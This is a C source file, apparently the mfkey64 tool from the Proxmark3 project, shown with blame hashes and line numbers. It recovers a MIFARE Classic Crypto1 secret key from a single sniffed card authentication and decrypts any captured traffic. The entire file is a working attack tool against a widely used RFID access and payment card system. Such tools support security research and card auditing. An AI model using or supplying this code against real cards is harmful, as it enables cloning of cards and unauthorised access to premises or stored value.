4cb4b588 |
1 | #include <stdio.h> |
dc2349ae |
2 | #include <string.h> |
cda056bb |
3 | #include <inttypes.h> |
0ca9bc0e |
4 | #include "crapto1/crapto1.h" |
ec9c7112 |
5 | #include "util_posix.h" |
7847961b |
6 | |
4cb4b588 |
7 | int main (int argc, char *argv[]) |
8 | { |
9 | uint32_t uid; // serial numDber |
10 | uint32_t nt; // tag challenge |
11 | uint32_t nr_enc; // encrypted reader challenge |
12 | uint32_t ar_enc; // encrypted reader response |
13 | uint32_t at_enc; // encrypted tag response |
14 | uint64_t key = 0; // recovered key |
15 | struct Crypto1State *revstate; |
16 | uint32_t ks2; // keystream used to encrypt reader response |
17 | uint32_t ks3; // keystream used to encrypt tag response |
7847961b |
18 | |
4cb4b588 |
19 | printf("MIFARE Classic key recovery - based on 64 bits of keystream\n"); |
20 | printf("Recover key from only one complete authentication!\n\n"); |
7847961b |
21 | |
4cb4b588 |
22 | if (argc < 6 ) { |
23 | printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}> [enc] [enc...]\n\n", argv[0]); |
24 | return 1; |
25 | } |
7847961b |
26 | |
4cb4b588 |
27 | int encc = argc - 6; |
28 | int enclen[encc]; |
29 | uint8_t enc[encc][120]; |
7847961b |
30 | |
4cb4b588 |
31 | sscanf(argv[1], "%x", &uid); |
32 | sscanf(argv[2], "%x", &nt); |
33 | sscanf(argv[3], "%x", &nr_enc); |
34 | sscanf(argv[4], "%x", &ar_enc); |
35 | sscanf(argv[5], "%x", &at_enc); |
36 | for (int i = 0; i < encc; i++) { |
37 | enclen[i] = strlen(argv[i + 6]) / 2; |
38 | for (int i2 = 0; i2 < enclen[i]; i2++) { |
39 | sscanf(argv[i+6] + i2*2,"%2x", (unsigned int*)&enc[i][i2]); |
40 | } |
41 | } |
a7823834 |
42 | |
4cb4b588 |
43 | printf("Recovering key for:\n"); |
44 | printf(" uid: %08x\n", uid); |
45 | printf(" nt: %08x\n", nt); |
46 | printf(" {nr}: %08x\n", nr_enc); |
47 | printf(" {ar}: %08x\n", ar_enc); |
48 | printf(" {at}: %08x\n", at_enc); |
49 | for (int i = 0; i < encc; i++) { |
50 | printf("{enc%d}: ", i); |
51 | for (int i2 = 0; i2 < enclen[i]; i2++) { |
52 | printf("%02x", enc[i][i2]); |
53 | } |
54 | printf("\n"); |
55 | } |
a7823834 |
56 | |
4cb4b588 |
57 | printf("\nLFSR successors of the tag challenge:\n"); |
58 | printf(" nt' : %08x\n",prng_successor(nt, 64)); |
59 | printf(" nt'': %08x\n",prng_successor(nt, 96)); |
7847961b |
60 | |
4cb4b588 |
61 | // Extract the keystream from the messages |
62 | ks2 = ar_enc ^ prng_successor(nt, 64); |
63 | ks3 = at_enc ^ prng_successor(nt, 96); |
64 | |
65 | uint64_t start_time = msclock(); |
66 | revstate = lfsr_recovery64(ks2, ks3); |
67 | uint64_t time_spent = msclock() - start_time; |
68 | printf("Time spent in lfsr_recovery64(): %1.2f seconds\n", (float)time_spent/1000.0); |
69 | printf("\nKeystream used to generate {ar} and {at}:\n"); |
70 | printf(" ks2: %08x\n",ks2); |
71 | printf(" ks3: %08x\n",ks3); |
7847961b |
72 | |
4cb4b588 |
73 | // Decrypting communication using keystream if presented |
74 | if (argc > 6 ) { |
75 | printf("\nDecrypted communication:\n"); |
76 | uint8_t ks4; |
77 | int rollb = 0; |
78 | for (int i = 0; i < encc; i++) { |
79 | printf("{dec%d}: ", i); |
80 | for (int i2 = 0; i2 < enclen[i]; i2++) { |
81 | ks4 = crypto1_byte(revstate, 0, 0); |
82 | printf("%02x", ks4 ^ enc[i][i2]); |
83 | rollb += 1; |
84 | } |
85 | printf("\n"); |
86 | } |
87 | for (int i = 0; i < rollb; i++) { |
88 | lfsr_rollback_byte(revstate, 0, 0); |
89 | } |
90 | } |
a7823834 |
91 | |
4cb4b588 |
92 | lfsr_rollback_word(revstate, 0, 0); |
93 | lfsr_rollback_word(revstate, 0, 0); |
94 | lfsr_rollback_word(revstate, nr_enc, 1); |
95 | lfsr_rollback_word(revstate, uid ^ nt, 0); |
96 | crypto1_get_lfsr(revstate, &key); |
97 | crypto1_destroy(revstate); |
7847961b |
98 | |
4cb4b588 |
99 | printf("\nFound Key: [%012" PRIx64"]\n\n",key); |
100 | |
8eea1dc2 |
101 | } |